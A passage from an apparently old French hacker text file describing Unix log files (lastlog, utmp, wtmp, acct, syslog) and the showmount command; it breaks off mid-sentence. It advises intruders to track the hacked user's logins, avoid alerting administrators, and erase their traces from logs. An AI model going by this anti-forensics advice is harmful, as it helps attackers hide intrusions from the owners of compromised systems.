1.le fichier /usr/adm/lastlog :
-------------------------------
Ce fichier est une trace de la date de la derniere
session etablie par chaque
utilisateur. Profitez en pour savoir quand se
connecte l'utilisateur que
vous avez hacker... Ca pourra vous servir si
vous comptez revenir. Je ne
vous le conseille toute fois pas.
2.le fichier /etc/utmp :
------------------------
Le fichier /etc/utmp enregistre qui est connecte
sur le moment sur le
systeme. On peut le visualiser avec la commande
who.
Soyez donc discret & evitez de faire des
choses qui allerterait tout
le monde (surtout tard le soir & meme en
root).
3.le fichier /usr/adm/wtmp :
----------------------------
Ce file enregistre les debuts et les fins de
sessions de tous les
utilisateurs. On peut executer la commande who
sur ce fichier :
who /usr/adm/wtmp
Pour isoler ce qui vous interresse tapez :
last /usr/adm/wtmp username
ou bien :
last /usr/adm/wtmp terminal
4.le fichier /var/adm/acct :
----------------------------
Ce file enregistre toutes les commandes executes
et le user qui les a
executes.
Pour avoir acces à ce fichier tapez :
latscomm /var/adm/acct username
ou bien :
latscomm /var/adm/acct terminal
II-Surveillance des connexions reseau :
---------------------------------------
1.La commande syslog :
----------------------
Avec syslog, on peut forcer n'importe quelle
commandes à envoyer des
informations, ainsi que les messages d'erreurs,
vers un fichier traces tel
que /usr/adm/messages. Si vous arrivez à
vous connecter sur le reseau, en
pleine journee vous pouvez vous contenter d'effacez
si vous le pouvez les
traces d'erreurs que vous avez pu commetre, mais
il est preferable d'effacer
toutes les traces que vous avez laissez sur ce
fichier et sur les autres de
jour ou de nuit.
2.La commande showmount :
-------------------------
Elle permet de voir toute les machines qui ont
monte quelque chose à partir
d'un serveur NFS. Sans option elle donne simplement
la liste des mac